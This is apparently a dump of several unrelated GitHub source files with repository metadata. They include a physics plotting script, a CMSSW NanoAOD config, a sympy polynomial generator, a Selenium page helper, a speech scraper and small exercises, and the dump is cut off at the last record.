c49705f6dd326f1e0802c350858608f5fa07c66c | 24bf46f243dc6efbe28b714b47b8e0302bb1296d | /Week8/ex3/string_match.py | be4ede72709e0bcf0df7e28b3fbf204a00d6b968 | [] | no_license | AizadaNur/WebDev | 5e14387dfa6d415de0ac2198f03857b8bb5fc602 | e1e14e6642b8ce4db7319779765de86c82dea331 | refs/heads/master | 2022-04-10T11:20:44.359588 | 2020-04-06T12:34:59 | 2020-04-06T12:34:59 | 250,175,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | def string_match(a, b):
shorter = min(len(a), len(b))
count = 0
for i in range(shorter - 1):
a_sub = a[i:i + 2]
b_sub = b[i:i + 2]
if a_sub == b_sub:
count = count + 1
return count | [
"noreply@github.com"
] | noreply@github.com |
c9f5462865456218e08ee41c59bc87ac1d9523dc | 6c922b75cd0f7b76d80d1f0e0b4e7e65b2d6ed52 | /code/plotting/snapshots_figure.py | 1d9e626e0257180007141e75fea28f3f7b6df149 | [] | no_license | mahdikooshkbaghi/stratified_heat_transport_paper2017 | 5f879e690908604272617915a8e2461b09d003a3 | db5864e37494f271da8cc0d533381e7378944daa | refs/heads/master | 2022-08-26T07:32:43.489533 | 2018-04-27T19:57:27 | 2018-04-27T19:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,502 | py | import matplotlib
matplotlib.use('Agg')
matplotlib.rcParams.update({'font.size': 11, 'axes.labelsize': 10})
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.pyplot as plt
plt.style.use('classic')
import matplotlib.patheffects as PathEffects
import matplotlib.colorbar as colorbar
from base.plot_buddy import MovieBuddy
import numpy as np
FIGWIDTH=3+7.0/16
FIGHEIGHT= FIGWIDTH*1
start_file=49
n_files = 3
dir1="/nobackup/eanders/sp2017/comps_data/FC_poly_fixed_constMu_constKappa_nrhocz3_Ra1.00e6_Pr1_eps1e-4_nusselt_fixedT_highres/"
#dir1="/nobackup/eanders/sp2017/fc_poly_hydro/FC_poly_fixed_constMu_constKappa_2D_nrhocz3_Ra1.00e6_Pr1_eps1e-4_a4_nusselt_fixedT"
dir2="/nobackup/eanders/sp2017/fc_poly_hydro/FC_poly_fixed_constMu_constKappa_2D_nrhocz3_Ra1.00e6_Pr1_eps5e-1_a4_nusselt_fixedT"
dir3="/nobackup/eanders/sp2017/fc_poly_hydro/FC_poly_fixed_constMu_constKappa_2D_nrhocz3_Ra4.64e7_Pr1_eps5e-1_a4_nusselt_fixedT"
dir4="/nobackup/bpbrown/polytrope-evan-3D/FC_poly_3D_nrhocz3_Ra1e6_Pr1_eps1e-4_a4/"
stds=1
def add_snapshot_subplot(ax, dir, start_file, do_cbar=False, figure_index=0, n_files=3, field='s', horiz_slice=False, plot_label=None, dims='$\mathrm{2D}$ | '):
plotter = MovieBuddy(dir, max_files=n_files, start_file=start_file)
plotter.add_subplot(field, 0, 0, zlabel="s'", sub_t_avg=True)
plotter.analyze_subplots()
slices = plotter.grab_whole_profile(plotter.local_files['slices'], plotter.local_writes_per_file,
subkey=['tasks'], profile_name=[field])
#max = plotter.ax[0]['mean']+stds*plotter.ax[0]['stdev']/2
#min = plotter.ax[0]['mean']-stds*plotter.ax[0]['stdev']/2
max = plotter.ax[0]['max_val']/3
min = -plotter.ax[0]['max_val']/3
if horiz_slice:
xs, ys = plotter.y_xx, plotter.y_yy
else:
xs, ys = plotter.xs, plotter.zs
if type(plotter.y) == type(None):
img = ax.pcolormesh(xs, ys, slices[field][figure_index,:,:]-plotter.ax[0]['t_avg'], cmap='RdBu_r',
vmin=min, vmax=max)
else:
if horiz_slice:
img = ax.pcolormesh(xs, ys, slices[field][figure_index,:,:][:,:,0]-np.mean(plotter.ax[0]['t_avg']), cmap='RdBu_r',
vmin=min, vmax=max)
else:
img = ax.pcolormesh(xs, ys, slices[field][figure_index,:,:][:,0,:]-plotter.ax[0]['t_avg'], cmap='RdBu_r',
vmin=min, vmax=max)
ax.set_xlim(np.min(xs), np.max(xs))
ax.set_ylim(np.min(ys), np.max(ys))
xticks = np.array([0, np.max(xs)/2, np.max(xs)])
xticklabels = [r'${:1.1f}$'.format(tick) for tick in xticks]
xticklabels[0] = r'${:1d}$'.format(0)
plt.xticks(xticks, xticklabels, fontsize=8)
yticks = np.array([0, np.max(ys)])
yticklabels = [r'${:1.1f}$'.format(tick) for tick in yticks]
yticklabels[0] = r'${:1d}$'.format(0)
plt.yticks(yticks, yticklabels, fontsize=8)
custom_label=True
if type(plot_label) == type(None):
custom_label=False
small_eps, small_ra = False, False
plot_label = '{:s}$\epsilon='.format(dims)
if plotter.atmosphere['epsilon'] < 0.1:
plot_label += '10^{'
plot_label += '{:1.0f}'.format(np.log10(plotter.atmosphere['epsilon']))
plot_label += '}$'
else:
plot_label += '{:1.1f}$'.format(plotter.atmosphere['epsilon'])
small_eps = True
ra_log = np.log10(plotter.atmosphere['rayleigh'])
plot_label += ' | $\mathrm{Ra} = 10^{'
if np.floor(ra_log) == ra_log:
plot_label += '{:1.0f}'.format(ra_log)
small_ra = True
else:
plot_label += '{:1.2f}'.format(ra_log)
plot_label += '}$'
plot_label = r'({:s})'.format(plot_label)
else:
plot_label = r'(${:s}$)'.format(plot_label)
# plt.annotate(plot_label, coords, size=9, color='white', path_effects=[PathEffects.withStroke(linewidth=1.2, foreground='black')])
if max > 0.1:
cbar_label = '$\pm {:1.2f}$'.format(max)
else:
str = '{:1.2e}'.format(max)
print(str)
if 'e+0' in str:
newstr = str.replace('e+0', '\\times 10^{')
elif 'e-0' in str:
newstr = str.replace('e-0', '\\times 10^{-')
else:
newstr = str.replace('e', '\\times 10^{')
newstr += '}'
cbar_label = '$\pm {:s}$'.format(newstr)
# cbar_label += ' ({:s})'.format(plot_label)
if do_cbar:
cax, kw = colorbar.make_axes(ax, fraction=0.15, pad=0.03, aspect=5, anchor=(0,0), location='top')
cbar = colorbar.colorbar_factory(cax, img, **kw)
for label in cax.xaxis.get_ticklabels():
label.set_visible(False)
cax.tick_params(axis=u'both', which=u'both',length=0)
trans = cax.get_yaxis_transform()
cax.annotate(r'{:s}'.format(cbar_label), (1.02,0.04), size=8, color='black', xycoords=trans)
cax.annotate(r'{:s}'.format(plot_label), (2.08,0.04), size=8, color='dimgrey', xycoords=trans)
else:
divider = make_axes_locatable(ax)
if horiz_slice:
cax = divider.append_axes('top', size='40%', pad=0.01)
cbx = divider.append_axes('bottom', size='30%', pad=0.01)
cbx.set_frame_on(False)
cbx.get_xaxis().set_visible(False)
cbx.get_yaxis().set_visible(False)
for xlabel in cbx.xaxis.get_ticklabels():
xlabel.set_visible(False)
for ylabel in cbx.yaxis.get_ticklabels():
ylabel.set_visible(False)
else:
cax = divider.append_axes('top', size='10%', pad=0.06)
cax.set_frame_on(False)
cax.get_xaxis().set_visible(False)
cax.get_yaxis().set_visible(False)
for xlabel in cax.xaxis.get_ticklabels():
xlabel.set_visible(False)
for ylabel in cax.yaxis.get_ticklabels():
ylabel.set_visible(False)
trans = ax.get_xaxis_transform() # x in data untis, y in axes fraction
ann = ax.annotate(cbar_label, xy=(-0.05, 1.05 ), size=8, color='black', xycoords=trans)
if not custom_label:
if np.floor(ra_log) != ra_log:
ann = ax.annotate(plot_label, xy=(xticks[-1]*0.48, 1.05 ), size=8, color='dimgrey', xycoords=trans)
elif small_eps:
ann = ax.annotate(plot_label, xy=(xticks[-1]*0.53, 1.05 ), size=8, color='dimgrey', xycoords=trans)
else:
ann = ax.annotate(plot_label, xy=(xticks[-1]*0.49, 1.05 ), size=8, color='dimgrey', xycoords=trans)
else:
ann = ax.annotate(plot_label, xy=(xticks[1]*1.25, 1.05 ), size=8, color='dimgrey', xycoords=trans)
# plt.annotate(cbar_label, (0, yticks[-1]*1.01), size=8, color='black')
fig = plt.figure(figsize=(2*FIGWIDTH, FIGHEIGHT), dpi=1200)
plt.subplots_adjust(wspace=0.4)
ax1 = plt.subplot2grid((3,4), (0,0), colspan=2)
add_snapshot_subplot(ax1, dir1, 85, do_cbar=True, figure_index=20, n_files=3)
ax2 = plt.subplot2grid((3,4), (1,0), colspan=2)
add_snapshot_subplot(ax2, dir2, 70, figure_index=64, n_files=4)
ax3 = plt.subplot2grid((3,4), (2,0), colspan=2)
add_snapshot_subplot(ax3, dir3, 70, figure_index=5, n_files=2)
#3D
ax4 = plt.subplot2grid((3,4), (0,2), colspan=2)
add_snapshot_subplot(ax4, dir4, 30, figure_index=9, n_files=2, dims= '$\mathrm{3D}$ | ')
ax5 = plt.subplot2grid((3,4), (1,2), rowspan=2)
add_snapshot_subplot(ax5, dir4, 30, figure_index=9, n_files=2, field='s midplane', horiz_slice=True, plot_label='z=L_z/2')
ax6 = plt.subplot2grid((3,4), (1,3), rowspan=2)
add_snapshot_subplot(ax6, dir4, 30, figure_index=9, n_files=2, field='s near top', horiz_slice=True, plot_label='z=L_z')
#ax2.plot([-0.11, 1.055], [1.175, 1.175], transform=ax2.transAxes, clip_on=False, color='black', linewidth=0.35)
#ax3.plot([-0.11, 1.055], [1.175, 1.175], transform=ax3.transAxes, clip_on=False, color='black', linewidth=0.35)
labels = [r'$\mathrm{(a)}$', r'$\mathrm{(b)}$', r'$\mathrm{(c)}$', r'$\mathrm{(d)}$', r'$\mathrm{(e)}$', r'$\mathrm{(f)}$']
axes = [ax1, ax2, ax3, ax4, ax5, ax6]
x_coords = [-0.1, -0.1, -0.1, -0.1, -0.2, -0.2]
y_coords = [3, 8, 8, 3, 10.7, 10.7]
for i, ax in enumerate(axes):
label = labels[i]
trans = ax.get_yaxis_transform() # y in data untis, x in axes fraction
ann = ax.annotate(label, xy=(x_coords[i], y_coords[i]), size=9, color='black', xycoords=trans)
print('saving png')
plt.savefig('./figs/snapshots_fig.png', bbox_inches='tight', dpi=600)
| [
"evan.anders@colorado.edu"
] | evan.anders@colorado.edu |
e7286bf68d15b2d3db9a057f10671fc073ab2fe3 | de390163287fda86b73df015d6b6a3dc5e1bf736 | /Codechef/September 2019/Long Challenge/test.py | 3d59dfaf9a3263d8a1af70275f55da158193ba5d | [] | no_license | iamarshsingh/Competative_programming | fb71a7b62d4ba2846deae25203f9087f31a0b675 | 09418842d029b20d2df0f5b5a5e87619f44a18b3 | refs/heads/master | 2020-06-26T14:39:59.199295 | 2020-03-28T14:05:26 | 2020-03-28T14:05:26 | 97,026,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | arr = [ i for i in range(1,5001) ]
for i in range(1,5001):
sum = 0
for j in range(1,i+1):
sum = sum + ((i*i)//j)
#print(sum)
sum = (2*sum) - (i*i)
arr[i-1] = sum
print(arr) | [
"singh.arshdeep1999@gmail.com"
] | singh.arshdeep1999@gmail.com |
f9795e22c2bfb02371122e898ea5d73349fc3146 | 791a66a3e9fbc554cbcb95685d511f82eb67b9bf | /src/generate_polys.py | 8e0bb7b178bd87607a1d3442b427b6802778d72f | [] | no_license | devingreene/order_perturbations_5loci | 0532c4c9800ca18cbcb38fd2d65aa25eb8f17bc8 | 3cc165da64b19ff468748519999e2d36c63e416f | refs/heads/master | 2020-03-27T21:28:59.086610 | 2018-09-03T19:42:09 | 2018-09-03T19:42:09 | 147,148,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,710 | py | from sympy.parsing.sympy_parser import parse_expr
__all__ = ['append_and_add_symbols','generate_polys','symbols']
symbols = set()
def append_and_add_symbols(lst,str_):
expr = parse_expr(str_)
lst.append(expr)
symbols.update(expr.free_symbols)
def _switch(bit):
return '0' if bit=='1' else '1' if bit == '0' else None
def generate_polys():
poly_list = []
for k in range(5):
# i,j are the two backgrounds
for i in range(16):
for j in range(i+1,16):
# Fill with zeros on the left and convert to base 2
a = '{:04b}'.format(i)
b = '{:04b}'.format(j)
# Insert flipped loci appropriately
a0 = a[:k] + '0' + a[k:]
a1 = a[:k] + '1' + a[k:]
b0 = b[:k] + '0' + b[k:]
b1 = b[:k] + '1' + b[k:]
# add polynomial
append_and_add_symbols(poly_list,'(w{} - w{})*(w{} - w{})'.format(a0,a1,b0,b1))
#k,l represent where among changing loci background loci are placed.
# There are n+1 positions to choose from among n background loci
for k in range(4):
for l in range(k,4):
#i,j are backgrounds -> 3 loci means 8 backgrounds, taken in pairs
for i in range(8):
for j in range(i+1,8):
# See above in one mutant case
a,b = ('{:03b}'.format(x) for x in (i,j))
# Two initial states
for ch in (('0','0'),('0','1')):
# Insert loci which change appropriately
append_and_add_symbols(poly_list,
('(w{} - w{})*'.format(a[:k]+ch[0]+a[k:l]+ch[1]+a[l:],
a[:k]+_switch(ch[0])+a[k:l]+_switch(ch[1])+a[l:]) +
'(w{} - w{})'.format(b[:k]+ch[0]+b[k:l]+ch[1]+b[l:],
b[:k]+_switch(ch[0])+b[k:l]+_switch(ch[1])+b[l:]))
)
# See comments in two-mutant block to understand how this works.
for k in range(3):
for l in range(k,3):
for m in range(l,3):
for i in range(4):
for j in range(i+1,4):
a,b = ('{:02b}'.format(x) for x in (i,j))
for ch in (('0','0','0'),('0','0','1'),('0','1','0'),
('0','1','1')):
append_and_add_symbols(poly_list,
('(w{} - w{})*'.format(
a[:k]+ch[0]+a[k:l]+ch[1]+a[l:m]+ch[2]+a[m:],
a[:k]+_switch(ch[0])+a[k:l]+_switch(ch[1])+a[l:m]+_switch(ch[2])+a[m:]) +
'(w{} - w{})'.format(
b[:k]+ch[0]+b[k:l]+ch[1]+b[l:m]+ch[2]+b[m:],
b[:k]+_switch(ch[0])+b[k:l]+_switch(ch[1])+b[l:m]+_switch(ch[2])+b[m:]))
)
# See comments in two-mutant block to understand how this works.
for k in range(2):
for l in range(k,2):
for m in range(l,2):
for n in range(m,2):
for i in range(2):
for j in range(i+1,2):
a,b = ('{:01b}'.format(x) for x in (i,j))
# iterate thru (0,0,0,0),(0,0,0,1),(0,0,1,0) ...
for ch in ( list('0{:03b}'.format(i)) for i in range(8)):
append_and_add_symbols(poly_list,
('(w{} - w{})*'.format(
a[:k]+ch[0]+a[k:l]+ch[1]+a[l:m]+ch[2]+a[m:n]+ch[3]+a[n:],
a[:k]+_switch(ch[0])+
a[k:l]+_switch(ch[1])+
a[l:m]+_switch(ch[2])+
a[m:n]+_switch(ch[3])+a[n:])+
'(w{} - w{})'.format(
b[:k]+ch[0]+b[k:l]+ch[1]+b[l:m]+ch[2]+b[m:n]+ch[3]+b[n:],
b[:k]+_switch(ch[0])+
b[k:l]+_switch(ch[1])+
b[l:m]+_switch(ch[2])+
b[m:n]+_switch(ch[3])+b[n:]))
)
return poly_list
| [
"devin@greene.cz"
] | devin@greene.cz |
6a3623bd08a74a8f907ecbdfc4368e677f98e843 | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/dataRunA/nano1433.py | a2fb809bcd5cf445b8aa9aa55ee1a7513b1de66e | [] | no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,293 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --data --eventcontent NANOAOD --datatier NANOAOD --no_exec --conditions 102X_dataRun2_Sep2018Rereco_v1 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein /users/h2/rsk146/JTTest/SL7/CMSSW_10_6_12/src/ttbarCutTest/dataReprocessing/0004A5E9-9F18-6B42-B31D-4206406CE423.root --fileout file:jetToolbox_nano_datatest.root
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:root://cms-xrd-global.cern.ch//store/data/Run2018A/EGamma/MINIAOD/17Sep2018-v2/120000/AFA857F6-C77B-314D-B472-A50BFA0A7BAC.root'),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.NANOAODoutput = cms.OutputModule("NanoAODOutputModule",
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('NANOAOD'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:jetToolbox_nano_datatest1433.root'),
outputCommands = process.NANOAODEventContent.outputCommands
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_dataRun2_Sep2018Rereco_v1', '')
# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequence)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.NANOAODoutput_step = cms.EndPath(process.NANOAODoutput)
# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# customisation of the process.
# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeData
#call to customisation function nanoAOD_customizeData imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeData(process)
# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)
# End of customisation functions
# Customisation from command line
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion | [
"rsk146@scarletmail.rutgers.edu"
] | rsk146@scarletmail.rutgers.edu |
0715fd0b7eb50cb61eb5b8b45cab73ceb41c0401 | f4534e1f23add4255a810688cc2d1c6c10a4c9b3 | /ch07/ex7-1.py | 39a55a8d82466def138a5764f39a4b20b086866d | [
"MIT"
] | permissive | jasonhuayen91/Introduction_to_Computing_and_Programming_Using_Python | 610ee2c060dd45d04652fb823f29a88c6bca1c45 | 9f211e66f8711b6c35405a1f40f14fcf9637294a | refs/heads/master | 2021-05-29T23:21:40.326647 | 2015-03-03T16:41:54 | 2015-03-03T16:41:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | def sumDigit(s):
"""sを文字列とする.
sの中の数字の合計を返す.
例えば, sが'a2b3c'ならば5を返す"""
ret = 0
for d in s:
try:
ret += int(d)
except ValueError:
pass
return ret
print(sumDigit('a2b3c') == 5)
| [
"premier3next@yahoo.co.jp"
] | premier3next@yahoo.co.jp |
f14bd6aa41aa3ad7ff7125f37ea0a33130409c19 | 9e81f89418be3dbae1be1080ed807ec69b934af6 | /nulspy/nuls.py | 9bc41b7221117c20474c49e2c1593b8406bb9167 | [
"MIT"
] | permissive | xiangxn/nulspy | 373062ffd3a8fcda1e68e724082db137b39c769b | df2323bcb6fb76b16e236a5c2331a1a74ee99908 | refs/heads/master | 2021-02-18T13:15:19.957348 | 2020-12-02T14:44:43 | 2020-12-02T14:44:43 | 245,199,515 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,867 | py | from .api.rpc_api import RpcAPI
from coincurve import PrivateKey, PublicKey
from .transaction import Transaction
from .address import Address
from .define import Define
import nulspy.trxs.contract
import time
import math
class NULS:
def __init__(self, api_url, private_key, chain_id=2):
self.api_url = api_url
self.chain_id = chain_id
self.api = RpcAPI(self.api_url, self.chain_id)
if isinstance(private_key, bytes) and len(private_key) == 32:
self.private_key = private_key
else:
assert len(private_key) == 64, "Invalid private key"
self.private_key = bytes.fromhex(private_key)
async def countFee(self, tx, signatrueCount):
data = await tx.serialize()
txSize = len(data)
txSize = txSize + signatrueCount * 110
return 100000 * math.ceil(txSize / 1024)
def twoDimensionalArray(self, args, argsType):
if not args or len(args) == 0:
return None
elif len(args) != len(argsType):
raise ValueError("args number error")
else:
two = []
for i in range(len(args)):
arg = args[i]
if not arg:
two.append([])
continue
if isinstance(arg, str):
if argsType and not arg and not isinstance(argsType[i], str):
two.append([])
elif not argsType and arg and "[]" in argsType[i]:
arrArg = eval(arg)
if isinstance(arrArg, list):
ma = []
for k in range(len(arrArg)):
ma.append(str(arrArg[k]))
two.append(ma)
else:
raise ValueError("args number error")
else:
two.append([arg])
elif isinstance(arg, list):
mb = []
for n in range(len(arg)):
mb.append(str(arg[n]))
two.append(mb)
else:
two.append([str(arg)])
return two
async def transfer(self, from_addr, to_addr, amount, memo="", asset_id=1, asset_chain_id=2):
nonce = ""
balance = await self.api.getBalance(from_addr, asset_chain=asset_chain_id, asset=asset_id)
assert balance, "Failed to get balance"
nonce = balance['nonce']
outputs = [{"address": to_addr, "amount": amount, "lockTime": 0, "assetsChainId": asset_chain_id, "assetsId": asset_id}]
tx = await Transaction.fromDict({
"type": 2,
"time": int(time.time()),
"remark": memo.encode('utf-8'),
"coinFroms": [{
'address': from_addr,
'assetsChainId': asset_chain_id,
'assetsId': asset_id,
'amount': 0,
'nonce': nonce,
'locked': 0
}],
"coinTos": outputs
})
tx.inputs[0]['amount'] = ((await tx.calculateFee()) + sum([o['amount'] for o in outputs]))
await tx.signTx(self.private_key)
tx_hex = (await tx.serialize()).hex()
result = await self.api.broadcast(tx_hex)
if result and "hash" in result:
return result['hash']
else:
return None
async def estimateContractCallGas(self, contractAddress, methodName, addr=None, value=0, args=[], methodDesc=None):
if not addr:
addr = Address.getAddress(PrivateKey(self.private_key).public_key.format(), chain_id=self.chain_id)
result = await self.api.estimateContractCallGas(addr, contractAddress, methodName, value=value, args=args, methodDesc=methodDesc)
if result and "gasLimit" in result:
return result['gasLimit']
return 1
async def invokeView(self, contractAddress, methodName, methodDesc=None, args=[]):
result = await self.api.invokeView(contractAddress, methodName, methodDesc, args, self.chain_id)
if result and "result" in result:
return result['result']
return None
async def callContract(self, fromAddress, contractCall, remark="", assetsChainId=1, assetsId=1, privateKey=None):
balanceInfo = await self.api.getBalance(fromAddress, asset_chain=self.chain_id)
gasLimit = await self.estimateContractCallGas(contractCall['contractAddress'],
contractCall['methodName'],
addr=fromAddress,
value=contractCall['value'],
args=contractCall['args'],
methodDesc=contractCall['methodDesc'])
argsType = await self.api.getContractMethodArgsTypes(contractCall['contractAddress'],
contractCall['methodName'],
contractCall['methodDesc'],
chainId=self.chain_id)
args = self.twoDimensionalArray(contractCall['args'], argsType)
data = {
'chainId': self.chain_id,
'sender': fromAddress,
'contractAddress': contractCall['contractAddress'],
'value': contractCall['value'],
'gasLimit': gasLimit,
'price': Define.CONTRACT_MINIMUM_PRICE,
'methodName': contractCall['methodName'],
'methodDesc': contractCall['methodDesc'],
'args': args if args else []
}
gasFee = gasLimit * data['price']
amount = data['value'] + gasFee
transferInfo = {'fromAddress': fromAddress, 'assetsChainId': assetsChainId, 'assetsId': assetsId, 'amount': amount, 'fee': 100000}
if contractCall['value'] > 0:
transferInfo['toAddress'] = contractCall['contractAddress']
transferInfo['value'] = contractCall['value']
inputs = [{
'address': transferInfo['fromAddress'],
'assetsChainId': transferInfo['assetsChainId'],
'assetsId': transferInfo['assetsId'],
'amount': transferInfo['amount'] + transferInfo['fee'],
'locked': 0,
'nonce': balanceInfo['nonce']
}]
if int(balanceInfo['balance']) < inputs[0]['amount']:
raise ValueError("Your balance is not enough.")
outputs = []
if "toAddress" in transferInfo and transferInfo['toAddress']:
outputs = [{
'address': transferInfo['toAddress'],
'assetsChainId': transferInfo['assetsChainId'],
'assetsId': transferInfo['assetsId'],
'amount': transferInfo['value'],
'lockTime': 0
}]
tx = await Transaction.fromDict({
"type": 16,
"time": int(time.time()),
"remark": remark.encode('utf-8'),
"coinFroms": inputs,
"coinTos": outputs,
'txData': data
})
newFee = await self.countFee(tx, 1)
if transferInfo['fee'] != newFee:
transferInfo['fee'] = newFee
inputs['amount'] = transferInfo['amount'] + transferInfo['fee']
tx = await Transaction.fromDict({
"type": 16,
"time": int(time.time()),
"remark": remark.encode('utf-8'),
"coinFroms": inputs,
"coinTos": outputs,
'txData': data
})
if not privateKey:
privateKey = self.private_key
await tx.signTx(privateKey)
tx_hex = (await tx.serialize()).hex()
result = await self.api.broadcast(tx_hex)
if result and "hash" in result:
return result['hash']
else:
return None
async def contractCallOffline(self, contractAddress, methodName, sender=None, args=[], value=0, methodDesc=None, argsType=[], remark=None):
if not sender:
sender = Address.getAddress(PrivateKey(self.private_key).public_key.format(), chain_id=self.chain_id)
balance = await self.api.getBalance(sender, asset_chain=self.chain_id)
senderBalance = balance['balance']
nonce = balance['nonce']
res = await self.api.estimateContractCallGas(sender, contractAddress, methodName, value=value, args=args, methodDesc=methodDesc)
gasLimit = res['gasLimit']
result = await self.api.contractCallOffline(sender,
senderBalance,
nonce,
contractAddress,
gasLimit,
methodName,
value=value,
methodDesc=methodDesc,
args=args,
argsType=argsType,
remark=remark,
chain_id=self.chain_id)
if result and "txHex" in result:
return result
return None
async def getContractTxResult(self, trxHash, chainId=None) -> bool:
result = await self.api.getContractTxResult(trxHash, chainId=self.chain_id)
if result and "success" in result and result['success']:
return True
return False
| [
"xiangxn@163.com"
] | xiangxn@163.com |
ed692ad0f8875dd61c658bec4a1044361b1b034a | 53eb0a066fd73b6996b9c547536699865d499686 | /ElementApp/base.py | 23e1cddd867e0d32a2ee7be40e59e7433977ce86 | [] | no_license | zhangliwen1112/HoliEBR-UI | 862e2aeda7b2884df2aa586f4cf630b50b91a1af | c755c978d2c977f4962a3f4426e93524fd5a5d4f | refs/heads/master | 2023-05-07T02:12:54.662392 | 2021-05-26T08:47:36 | 2021-05-26T08:47:36 | 360,793,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | from selenium.webdriver.common.action_chains import ActionChains
class Page(object):
def __init__(self, driver):
self.driver = driver
def find_element(self, *loc):
return self.driver.find_element(*loc)
def find_elements(self, *loc):
return self.driver.find_elements(*loc)
def back(self):
return self.driver.back()
def forward(self):
return self.driver.forward()
def f5(self):
return self.driver.refresh()
def maxmize_window(self):
return self.driver.maximize_window()
def move_to_element(self, element):
ActionChains(self.driver).move_to_element(element).perform()
def clear_text(self, element):
element.clear()
def click(self, element):
element.click()
def input_text(self, element, value):
element.send_keys(value)
| [
"411454954@qq.com"
] | 411454954@qq.com |
c7a6c28a2bd7b90845c3a1da592be76352b16c64 | 1da5c73824b84d7da15248c787fa9ec87276c862 | /bolsonaro_data/speeches_to_df.py | 5f91a17559c6dfcfc62c66bbaf2abf5376a5017b | [] | no_license | pbragamiranda/presidential-speeches-scraper | a6d8963e856d934131220ee5be17a26d6395df9f | 1bbf8c90ab72994aa398032b099b0788779f91ee | refs/heads/main | 2023-04-18T06:38:21.969808 | 2021-04-29T00:00:08 | 2021-04-29T00:00:08 | 358,831,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,170 | py | # import libraries
import csv
import uuid
import time
import os.path
import requests
from bs4 import BeautifulSoup
# create function to write to csv
def write_csv(filename):
unique_filename = uuid.uuid4().hex + '___' + filename
with open(f'csv_data/{unique_filename}', 'w', newline='') as file:
writer = csv.writer(file, delimiter='|')
# writer.writerows(headers)
writer.writerows(data)
print(f'{unique_filename} created')
# get list of url
speechs_url = []
with open('speechs_url.csv', 'r') as file:
reader = csv.reader(file)
for row in reader:
speechs_url.append(row)
# scraping each speech
for url in speechs_url[0]:
data = [['date', 'title', 'speech']]
print(f'sraping {url}')
url = url
page = requests.get(url)
soup = BeautifulSoup(page.content,"html.parser")
title = soup.find('h1', class_='documentFirstHeading').text
date = soup.find("span", class_="value").text
published = f'Publicado em {date}'
print(published)
speech = soup.find(id='parent-fieldname-text').text
filename = date[:10].replace("/", "") + ".csv"
data.append([date, title, speech])
write_csv(filename)
time.sleep(5)
| [
"pbragamiranda@gmail.com"
] | pbragamiranda@gmail.com |
d14f782b0de48917af7243ab5ea11b9cf46f61c0 | 794decce384b8e0ba625e421cc35681b16eba577 | /tensorflow/python/ops/nn_loss_scaling_utilities_test.py | a71c0cf5992d24f735c49f3c68f1f7b9a7e2d43c | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause"
